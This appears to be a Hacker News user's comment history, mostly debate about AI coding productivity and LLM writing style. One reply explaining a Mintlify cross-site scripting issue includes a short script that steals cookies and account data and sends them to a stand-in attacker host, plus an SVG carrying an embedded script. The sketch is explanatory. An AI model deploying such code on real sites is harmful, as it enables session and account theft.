gowld's comments

I don't understand this thinking.

How many hours per week did you spend coding on your most recent project? If you could do something else during that time, and the code still got written, what would you do?

Or are you saying that you believe you can't get that code written without spending an equivalent amount of time describing your judgments?


"Writing code" is not the goal. The goal is to design a coherent logical system that achieves some goal. So the practice of programming is in thinking hard about what goal I want to achieve, then thinking about the sort of logical system that I could design that would allow me to verifiably achieve that goal, then actually banging out the code that implements the abstract logical system that I have in my head, then iterating to refine both the abstract system and its implementation. And as a result of being the one who produced the code, I have certainty that the code implements the system I have in mind, and that the system it represents is for for the purpose of achieving the original goals.

So reducing the part where I go from abstract system to concrete implementation only saves me time spent typing, while at the same time decoupling me from understanding whether the code actually implements the system I have in mind. To recover that coupling, I need to read the code and understand what it does, which is often slower than just typing it myself.

And to even express the system to the code generator in the first place still requires me to mentally bridge the gap between the goal and the system that will achieve that goal, so it doesn't save me any time there.

The exceptions are things where I literally don't care whether the outputs are actually correct, or they're things that I can rely on external tools to verify (e.g. generating conformance tests), or they're tiny boilerplate autocomplete snippets that aren't trying to do anything subtle or interesting.


The actual act of typing code into a text editor and building it could be the least interesting and least valuable part of software development. A developer who sees their job as "writing code" or a company leader who sees engineers' jobs as "writing code" is totally missing where the value is created.

Yes, there is artistry, craftsmanship, and "beautiful code" which shouldn't be overlooked. But I believe that beautiful code comes from solid ideas, and that ugly code comes from flawed ideas. So, as long as the (human-constructed) idea is good, the code (whether it is human-typed or AI-generated) should end up beautiful.


Raising the question: Where is the beautiful machine-generated code?

Where's the beautiful human-generated code? There's the IOCCC, but that's the only code compo that's a competition based on the code itself, and it's not even a beauty pageant. There's some demo scene stuff, which is more of a golf thing. There's random one-offs, like not-Carmack's inverse square, or Duff's device, but other than that, where're the good code beauty pageants?

Excellent point. Why are folks downvoting this?

Maybe they’re AIdiots?

In my experience (and especially at my current job) bottlenecks are more often organizational than technical. I spend a lot of time waiting for others to make decisions before I can actually proceed with any work.

My judgement is built into the time it takes me to code. I think I would be spending the same amount of time doing that while reviewing the AI code to make sure it isn't doing something silly (even if it does technically work).

A friend of mine recently switched jobs from Amazon to a small AI startup where he uses AI heavily to write code. He says it's improved his productivity 5x, but I don't really think that's the AI. I think it's (mostly) the lack of bureaucracy in his small 2 or 3 person company.

I'm very dubious about claims that AI can improve productivity so much because that just hasn't been my experience. Maybe I'm just bad at using it.


Does voice transcription count as AI? I'm an okay typer, but being able to talk to my computer, in English, is definitely part of the productivity speed up for me. Even though it struggles to do css because css is the devil, being able to yell at my computer and have it actually do things is cathartic in ways I never thought possible.

Depends. What year is it? Voice recognition definitely used to be considered AI, but today it's well-researched and unexciting.

No, not AI. Just an alternative input method.

All you did was change the programming language from (say) Python to English. One is designed to be a programming language, with few ambiguities, etc. The other is, well, English.

The speed of typing code is not all that different from the speed of typing English, even accounting for the volume expansion of English -> <favorite programming language>. And then, of course, there is the new extra cost of reading and understanding whatever code the AI wrote.


The thing about this metaphor that people don't seem to ever complete is:

Okay, you've switched to English. The speed of typing the actual tokens is just about the same but...

The standard library is FUCKING HUGE!

Every concept that you have ever read about? Every professional term, every weird thing that gestures at a whole chunk of complexity/functionality ... Now, if I say something to my LLM like:

> Consider the dimensional twins problem -- how're we gonna differentiate torque from energy here?

I'm able to ... "from physics import Torque, Energy, dimensional_analysis" And that part of the stdlib was written in 1922 by Bridgman!
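
To make that less hand-wavy, here's a rough sketch (in TypeScript, all names made up; a real units library would be far richer) of what that imaginary import buys you. Torque and energy both reduce to newton-meters, so bare numbers can't tell them apart, but distinct types can:

    // Torque and energy are dimensional twins: both are N*m as raw
    // numbers. Separate wrapper types keep them from mixing.
    class Torque {
      constructor(public readonly newtonMeters: number) {}
    }

    class Energy {
      constructor(public readonly joules: number) {}
    }

    // Work = torque * angle swept (radians): the one sanctioned way
    // to turn one twin into the other.
    function workFromTorque(t: Torque, angleRad: number): Energy {
      return new Energy(t.newtonMeters * angleRad);
    }

    const wrench = new Torque(50);          // 50 N*m applied to a bolt
    const oneTurn = workFromTorque(wrench, 2 * Math.PI);
    console.log(oneTurn.joules.toFixed(1)); // ~314.2 J

    // const oops: Energy = wrench; // type error: the twins stay apart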


> The standard library is FUCKING HUGE!

And extremely buggy, and impossible to debug, and does not accept or fix bug reports.

AI is like an extremely enthusiastic junior engineer that never learns or improves in any way based on your feedback.

I love working with junior engineers. One of the best parts about working with junior engineers is that they learn and become progressively more experienced as time goes on. AI doesn't.


People need to decide if their counter to AI making programmers obsolete is "current-generation AI is buggy, and this will not improve until I retire" or "I only spend 5% of my time coding, so it doesn't matter if AI can instantly replace my coding".

And come on: AI definitely will become better as time goes on.


It gets better when the AI provider trains a new model. It doesn't learn from the feedback of the person interacting with it, unlike a human.

Exactly. LLMs are faster for me when I don't care too much about the exact form the functionality takes. If I want precise results, I end up using more natural language to direct the LLM than it takes if I just write that part of the code myself.

I guess we find out which software products just need to be 'good enough' and which need to match the vision precisely.


> Or are you saying that you believe you can't get that code written without spending an equivalent amount of time describing your judgments?

It’s sort of the opposite: You don’t get to the proper judgement without playing through the possibilities in your mind, part of which is accomplished by spending time coding.


I think OP is closer to the latter. How I typically have been using Copilot is as a faster autocomplete that I read and tweak before moving on. Too many years of struggling to describe a task to Siri left me deciding “I’ll just show it what I want” rather than tell.

Inaccurate.

> Apple gave me access to this Mac Studio cluster to test RDMA over Thunderbolt,

Better:

"Engfluencer suggests you spend $15k to run a model slightly faster (jeffgeerling.com)"


These are fun but they lose too much of the original content.

"Texas accidentally does something good for privacy"

is not really an improvement over the original (already half-editorialized) "Texas is suing all of the big TV makers for spying on what you watch"


You log in to goodsite.com

goodsite.com loads a script from user-generated-content-site.com/evil.js

evil.js reads and writes all your goodsite.com account data.
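
A sketch of what evil.js can do once it's running (the endpoint names here are hypothetical):

    // evil.js executes with goodsite.com's origin, so the browser
    // attaches your logged-in session to every request it makes.
    const stolenCookies = document.cookie; // any non-HttpOnly cookies

    // Call goodsite.com's own API as you:
    fetch("/api/account", { credentials: "include" })
      .then((r) => r.json())
      .then((account) => {
        // ...then ship everything off to the attacker.
        fetch("https://attacker.example/collect", {
          method: "POST",
          body: JSON.stringify({ stolenCookies, account }),
          mode: "no-cors",
        });
      });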


The linked site https://heartbreak.ing/ explains that Mintlify disabled CORS, so that 3rd party sites can run code in your Mintlify-using environment (X, Vercel, etc).

The OP site says that .svg files can only run scripts if they are directly opened, not via <img> tags.

So how does the attack work?


My understanding is that the SVGs were imported directly and embedded as code, not as the `src` for an img tag. This is very common; it's a subjectively better way to render SVGs (given good security practices), as it lets you adjust and style them via CSS once they're just another element in the HTML DOM. It should only be done with "trusted" SVGs, however!
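
Roughly, the two rendering paths look like this (illustrative TypeScript; the function names are made up):

    // 1. Inline: paste the uploaded file's markup straight into the
    //    page. Stylable via CSS, but any <script> or onload handler
    //    inside it runs with the page's origin.
    function renderInline(svgMarkup: string): string {
      return `<div class="icon">${svgMarkup}</div>`; // unsafe for untrusted uploads
    }

    // 2. As an image: the browser rasterizes the SVG in isolation
    //    and never executes scripts inside it.
    function renderAsImage(svgUrl: string): string {
      return `<img src="${svgUrl}" alt="">`;
    }

    // A hostile upload that's inert via <img> but not inline:
    const hostile = `<svg xmlns="http://www.w3.org/2000/svg">
      <script>fetch("/api/account")/* ...exfiltrate... */</script>
    </svg>`;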

As for CORS, they were uploading the SVGs to an account of their own, but then using the vulnerabilities to pivot to other accounts.


Thanks, that makes sense. Strange that the writeup skipped the most important step in the vulnerability!

Which orgs?

On Mac, em-dash is option-shift-hyphen (aka shift-en-dash, aka capital en-dash).

In Menlo (Chrome on Mac's default monospace font, used for HN comments), em-dash (—) and en-dash (–) use the same glyph, though.


Are you saying that needless sentences don't count as needless words?

As GPT would say, "You've hit upon a crucial point underlying the entire situation!"


I think that's a great sentence to include... you know, provided it's actually true.

I mean, it's usually wrong in its rhetoric, and the writing isn't "good", but it's technically well constructed, in a way that "Hemingway" doesn't reject.

Like, if I ask GPT5 to convert 75f to celsius, it will say "OK, here's the tight answer. No fluff. Just the actual result you need to know." and then in a new graf say "It's 23.8c." (or whatever).


It already bugs me when ChatGPT describes how it is going to answer before answering, but it's 10x more annoying when I'm asking for a concise response without filler etc.

As an aside, I've noticed the self-description happens even more often when extended thinking mode is being used. My unverified intuition is that it references my custom instructions and memory more than once during the thinking process, as it then seems more primed than usual to mimic vocabulary from any saved text like that.


Right, it is currently incapable of providing a straight answer without clearing its throat and selling the answer. It reminds me of those recipe blogs that just can't get to the fucking recipe. It's bad writing! But it's not bad technically, in a style-guide kind of way.

Sometimes I wonder if the throat-clearing is an indispensable part of getting to the "good bits" that follow. Like, do those extra tokens give it more "room to think" even if they're basically meaningless in themselves?

The output tokens are the only information that is carried forward through each inference pass, so "more room to think" is incompatible with "basically meaningless". Perhaps one could imagine it somehow steganographically encoding information in its precise choice of meaningless throat clearing, but there are only so many variations on that theme - word choice is heavily constrained, so it doesn't feel like you could store a whole lot of information there without it starting to read froopiliciously.

Isn’t that the point of the hidden chain of thought tokens, rather than the visible cruft?

I think the fluff, the emojis, the sycophancy is all symptomatic of the training process and human feedback.


I thought PP was saying that the "Thinking" text is only used for one turn, and the response text is the compressed thinking that survives into future turns.

The submission is an ad.

University press releases should not be posted on HN. A press release is just a published paper + PR spin. If the PR spin were true, it would be in the paper. Just link to the paper.

https://www.nature.com/articles/s41467-025-64235-y

Title: "Pushing the boundary of quantum advantage in hard combinatorial optimization with probabilistic computers"

Abstract: "Adaptive parallel tempering [...] scales more favorably and outperforms simulated quantum annealing"

HN title should be changed to match the paper title or abstract.


Terr_ was agreeing with you and highlighting how old the debate is.

Highlighting, yes, agreeing, no.

For my original earlier reply, the main subtext would be: "Your complaint is ridiculously biased."

For the later reply about chess, perhaps: "You're asserting that tricking, amazing, or beating a human is a reliable sign of human-like intelligence. We already know that is untrue from decades of past experience."


> You're asserting that tricking, amazing, or beating a human is a reliable sign of human-like intelligence.

I don't know who's asserting that (other than Alan Turing, I guess); certainly not me. Humans are, if anything, easier to fool than our current crude AI models are. Heck, ELIZA was enough to fool non-specialist humans.

In any case, nobody was "tricked" at the IMO. What happened there required legitimate reasoning abilities. The burden of proof falls decisively on those who assert otherwise.

